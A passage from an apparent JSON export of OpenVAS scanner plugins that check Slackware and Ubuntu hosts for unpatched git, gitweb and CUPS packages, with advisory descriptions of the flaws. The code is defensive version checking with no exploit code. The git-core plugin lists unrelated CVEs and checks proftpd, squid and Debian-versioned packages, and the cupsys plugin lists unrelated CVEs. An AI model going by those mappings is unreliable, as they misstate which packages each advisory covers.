http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63428\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_cve_id(\"CVE-2008-3546\", \"CVE-2008-5516\", \"CVE-2008-5517\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 14202 $\");\n script_name(\"Slackware Advisory SSA:2009-051-02 git\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(12\\.0|12\\.1|12\\.2)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2009-051-02\");\n\n script_tag(name:\"insight\", value:\"New git packages are available for Slackware 12.0, 12.1, 12.2, and -current to\nfix security issues.\n\nThere are other security issues related to gitweb, which Slackware does not\nship, but could be added to a Slackware install. These problems are also\nfixed with this update.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2009-051-02.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"git\", ver:\"1.6.1.3-i486-1_slack12.0\", rls:\"SLK12.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"git\", ver:\"1.6.1.3-i486-1_slack12.1\", rls:\"SLK12.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"git\", ver:\"1.6.1.3-i486-1_slack12.2\", rls:\"SLK12.2\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-12-04T11:28:15", "bulletinFamily": "scanner", "description": "The remote host is missing an update to git-core\nannounced via advisory USN-723-1.", "modified": "2017-12-01T00:00:00", "published": "2009-06-05T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=64168", "id": "OPENVAS:64168", "title": 
"Ubuntu USN-723-1 (git-core)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: ubuntu_723_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# $Id: ubuntu_723_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# Description: Auto-generated from advisory USN-723-1 (git-core)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"The problem can be corrected by upgrading your system to the\n following package versions:\n\nUbuntu 6.06 LTS:\n git-core 1.1.3-1ubuntu1.1\n\nUbuntu 7.10:\n git-core 1:1.5.2.5-2ubuntu0.1\n gitweb 1:1.5.2.5-2ubuntu0.1\n\nUbuntu 8.04 LTS:\n git-core 1:1.5.4.3-1ubuntu2.1\n gitweb 1:1.5.4.3-1ubuntu2.1\n\nUbuntu 8.10:\n git-core 1:1.5.6.3-1.1ubuntu2.1\n gitweb 1:1.5.6.3-1.1ubuntu2.1\n\nIn general, a standard system upgrade is sufficient to effect the\nnecessary changes.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=USN-723-1\";\n\ntag_insight = \"It was discovered that Git did not properly handle long file paths. 
If a user\nwere tricked into performing commands on a specially crafted Git repository, an\nattacker could possibly execute arbitrary code with the privileges of the user\ninvoking the program. (CVE-2008-3546)\n\nIt was discovered that the Git web interface (gitweb) did not correctly handle\nshell metacharacters when processing certain commands. A remote attacker could\nsend specially crafted commands to the Git server and execute arbitrary code\nwith the privileges of the Git web server. This issue only applied to Ubuntu\n7.10 and 8.04 LTS. (CVE-2008-5516, CVE-2008-5517)\n\nIt was discovered that the Git web interface (gitweb) did not properly restrict\nthe diff.external configuration parameter. A local attacker could exploit this\nissue and execute arbitrary code with the privileges of the Git web server.\nThis issue only applied to Ubuntu 8.04 LTS and 8.10. (CVE-2008-5916)\";\ntag_summary = \"The remote host is missing an update to git-core\nannounced via advisory USN-723-1.\";\n\n \n\n\nif(description)\n{\n script_id(64168);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-05 18:04:08 +0200 (Fri, 05 Jun 2009)\");\n script_cve_id(\"CVE-2008-3546\", \"CVE-2008-5516\", \"CVE-2008-5517\", \"CVE-2008-5916\", \"CVE-2008-3974\", \"CVE-2009-0318\", \"CVE-2008-5984\", \"CVE-2009-0352\", \"CVE-2009-0353\", \"CVE-2009-0354\", \"CVE-2009-0355\", \"CVE-2009-0356\", \"CVE-2009-0357\", \"CVE-2009-0358\", \"CVE-2009-0316\", \"CVE-2008-5557\", \"CVE-2008-5658\", \"CVE-2008-5624\", \"CVE-2008-5625\", \"CVE-2008-5985\", \"CVE-2009-0544\", \"CVE-2008-3964\", \"CVE-2008-5907\", \"CVE-2009-0040\", \"CVE-2008-1232\", \"CVE-2008-1947\", \"CVE-2008-2370\", \"CVE-2009-0520\", \"CVE-2008-4810\", \"CVE-2008-3663\", \"CVE-2007-5624\", \"CVE-2008-1360\", \"CVE-2007-5803\", \"CVE-2009-0187\", \"CVE-2007-3698\", \"CVE-2007-3922\", 
\"CVE-2008-5263\", \"CVE-2009-0615\", \"CVE-2009-0616\", \"CVE-2009-0617\", \"CVE-2009-0618\", \"CVE-2009-0620\", \"CVE-2009-0621\", \"CVE-2009-0622\", \"CVE-2009-0623\", \"CVE-2009-0624\", \"CVE-2009-0625\", \"CVE-2009-0490\", \"CVE-2009-0614\", \"CVE-2009-0542\", \"CVE-2009-0543\", \"CVE-2009-0478\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu USN-723-1 (git-core)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-723-1/\");\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"git-doc\", ver:\"1.1.3-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-email\", ver:\"1.1.3-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gitk\", ver:\"1.1.3-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-arch\", ver:\"1.1.3-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-cvs\", ver:\"1.1.3-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-svn\", ver:\"1.1.3-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += 
res;\n}\nif ((res = isdpkgvuln(pkg:\"git-core\", ver:\"1.1.3-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-doc\", ver:\"1.5.2.5-2ubuntu0.1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gitk\", ver:\"1.5.2.5-2ubuntu0.1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-arch\", ver:\"1.5.2.5-2ubuntu0.1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-cvs\", ver:\"1.5.2.5-2ubuntu0.1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-daemon-run\", ver:\"1.5.2.5-2ubuntu0.1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-email\", ver:\"1.5.2.5-2ubuntu0.1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-gui\", ver:\"1.5.2.5-2ubuntu0.1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-p4\", ver:\"1.5.2.5-2ubuntu0.1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-svn\", ver:\"1.5.2.5-2ubuntu0.1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gitweb\", ver:\"1.5.2.5-2ubuntu0.1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-core\", ver:\"1.5.2.5-2ubuntu0.1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-doc\", ver:\"1.5.4.3-1ubuntu2.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gitk\", ver:\"1.5.4.3-1ubuntu2.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-arch\", ver:\"1.5.4.3-1ubuntu2.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-cvs\", ver:\"1.5.4.3-1ubuntu2.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-daemon-run\", 
ver:\"1.5.4.3-1ubuntu2.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-email\", ver:\"1.5.4.3-1ubuntu2.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-gui\", ver:\"1.5.4.3-1ubuntu2.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-svn\", ver:\"1.5.4.3-1ubuntu2.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gitweb\", ver:\"1.5.4.3-1ubuntu2.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-core\", ver:\"1.5.4.3-1ubuntu2.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-doc\", ver:\"1.5.6.3-1.1ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gitk\", ver:\"1.5.6.3-1.1ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-arch\", ver:\"1.5.6.3-1.1ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-cvs\", ver:\"1.5.6.3-1.1ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-daemon-run\", ver:\"1.5.6.3-1.1ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-email\", ver:\"1.5.6.3-1.1ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-gui\", ver:\"1.5.6.3-1.1ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-svn\", ver:\"1.5.6.3-1.1ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gitweb\", ver:\"1.5.6.3-1.1ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-core\", ver:\"1.5.6.3-1.1ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-crypto-dbg\", 
ver:\"2.0.1+dfsg1-2.3+lenny0\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-crypto\", ver:\"2.0.1+dfsg1-2.3+lenny0\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"proftpd-doc\", ver:\"1.3.1-17lenny1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"proftpd\", ver:\"1.3.1-17lenny1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"proftpd-basic\", ver:\"1.3.1-17lenny1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"proftpd-mod-ldap\", ver:\"1.3.1-17lenny1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"proftpd-mod-mysql\", ver:\"1.3.1-17lenny1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"proftpd-mod-pgsql\", ver:\"1.3.1-17lenny1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"squid-common\", ver:\"2.7.STABLE3-1ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"squid\", ver:\"2.7.STABLE3-1ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"squid-cgi\", ver:\"2.7.STABLE3-1ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:28:01", "bulletinFamily": "scanner", "description": "The remote host is missing an update to cupsys\nannounced via advisory USN-707-1.", "modified": "2017-12-01T00:00:00", "published": "2009-06-05T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=64165", "id": "OPENVAS:64165", "title": "Ubuntu USN-707-1 (cupsys)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: ubuntu_707_1.nasl 7969 
2017-12-01 09:23:16Z santu $\n# $Id: ubuntu_707_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# Description: Auto-generated from advisory USN-707-1 (cupsys)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"The problem can be corrected by upgrading your system to the\n following package versions:\n\nUbuntu 6.06 LTS:\n cupsys 1.2.2-0ubuntu0.6.06.12\n\nUbuntu 7.10:\n cupsys 1.3.2-1ubuntu7.9\n\nUbuntu 8.04 LTS:\n cupsys 1.3.7-1ubuntu3.3\n\nUbuntu 8.10:\n cups 1.3.9-2ubuntu6.1\n\nIn general, a standard system upgrade is sufficient to effect the\nnecessary changes.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=USN-707-1\";\n\ntag_insight = \"It was discovered that CUPS didn't properly handle adding a large number of RSS\nsubscriptions. A local user could exploit this and cause CUPS to crash, leading\nto a denial of service. This issue only applied to Ubuntu 7.10, 8.04 LTS and\n8.10. 
(CVE-2008-5183)\n\nIt was discovered that CUPS did not authenticate users when adding and\ncancelling RSS subscriptions. An unprivileged local user could bypass intended\nrestrictions and add a large number of RSS subscriptions. This issue only\napplied to Ubuntu 7.10 and 8.04 LTS. (CVE-2008-5184)\n\nIt was discovered that the PNG filter in CUPS did not properly handle certain\nmalformed images. If a user or automated system were tricked into opening a\ncrafted PNG image file, a remote attacker could cause a denial of service or\nexecute arbitrary code with user privileges. In Ubuntu 7.10, 8.04 LTS, and 8.10,\nattackers would be isolated by the AppArmor CUPS profile. (CVE-2008-5286)\n\nIt was discovered that the example pstopdf CUPS filter created log files in an\ninsecure way. Local users could exploit a race condition to create or overwrite\nfiles with the privileges of the user invoking the program. This issue only\napplied to Ubuntu 6.06 LTS, 7.10, and 8.04 LTS. (CVE-2008-5377)\";\ntag_summary = \"The remote host is missing an update to cupsys\nannounced via advisory USN-707-1.\";\n\n \n\n\nif(description)\n{\n script_id(64165);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-05 18:04:08 +0200 (Fri, 05 Jun 2009)\");\n script_cve_id(\"CVE-2008-5183\", \"CVE-2008-5184\", \"CVE-2008-5286\", \"CVE-2008-5377\", \"CVE-2009-0050\", \"CVE-2008-2383\", \"CVE-2007-4349\", \"CVE-2008-5077\", \"CVE-2009-0021\", \"CVE-2009-0025\", \"CVE-2008-5262\", \"CVE-2008-2237\", \"CVE-2008-2238\", \"CVE-2008-4314\", \"CVE-2008-5517\", \"CVE-2008-5516\", \"CVE-2008-3825\", \"CVE-2008-3997\", \"CVE-2008-4444\", \"CVE-2008-4006\", \"CVE-2008-5449\", \"CVE-2008-3979\", \"CVE-2008-3821\", \"CVE-2008-2382\", \"CVE-2008-5714\", \"CVE-2008-3818\", \"CVE-2009-0053\", \"CVE-2009-0054\", \"CVE-2009-0055\", \"CVE-2009-0056\", \"CVE-2008-5500\", 
\"CVE-2008-5503\", \"CVE-2008-5506\", \"CVE-2008-5507\", \"CVE-2008-5508\", \"CVE-2008-5511\", \"CVE-2008-5512\", \"CVE-2008-5256\", \"CVE-2008-5448\", \"CVE-2008-5718\", \"CVE-2007-4476\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu USN-707-1 (cupsys)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-707-1/\");\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libcupsys2-gnutls10\", ver:\"1.2.2-0ubuntu0.6.06.12\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-bsd\", ver:\"1.2.2-0ubuntu0.6.06.12\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-client\", ver:\"1.2.2-0ubuntu0.6.06.12\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys\", ver:\"1.2.2-0ubuntu0.6.06.12\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.2.2-0ubuntu0.6.06.12\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsimage2\", ver:\"1.2.2-0ubuntu0.6.06.12\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"libcupsys2-dev\", ver:\"1.2.2-0ubuntu0.6.06.12\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsys2\", ver:\"1.2.2-0ubuntu0.6.06.12\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-common\", ver:\"1.3.2-1ubuntu7.9\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-bsd\", ver:\"1.3.2-1ubuntu7.9\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-client\", ver:\"1.3.2-1ubuntu7.9\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys\", ver:\"1.3.2-1ubuntu7.9\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.3.2-1ubuntu7.9\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsimage2\", ver:\"1.3.2-1ubuntu7.9\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsys2-dev\", ver:\"1.3.2-1ubuntu7.9\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsys2\", ver:\"1.3.2-1ubuntu7.9\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-common\", ver:\"1.3.7-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-bsd\", ver:\"1.3.7-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-client\", ver:\"1.3.7-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys\", ver:\"1.3.7-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.3.7-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsimage2\", ver:\"1.3.7-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += 
res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsys2-dev\", ver:\"1.3.7-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsys2\", ver:\"1.3.7-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cups-common\", ver:\"1.3.9-2ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-bsd\", ver:\"1.3.9-2ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-client\", ver:\"1.3.9-2ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-dbg\", ver:\"1.3.9-2ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys\", ver:\"1.3.9-2ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsys2-dev\", ver:\"1.3.9-2ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-common\", ver:\"1.3.9-2ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsys2\", ver:\"1.3.9-2ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cups-bsd\", ver:\"1.3.9-2ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cups-client\", ver:\"1.3.9-2ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cups-dbg\", ver:\"1.3.9-2ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cups\", ver:\"1.3.9-2ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcups2-dev\", ver:\"1.3.9-2ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcups2\", ver:\"1.3.9-2ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = 
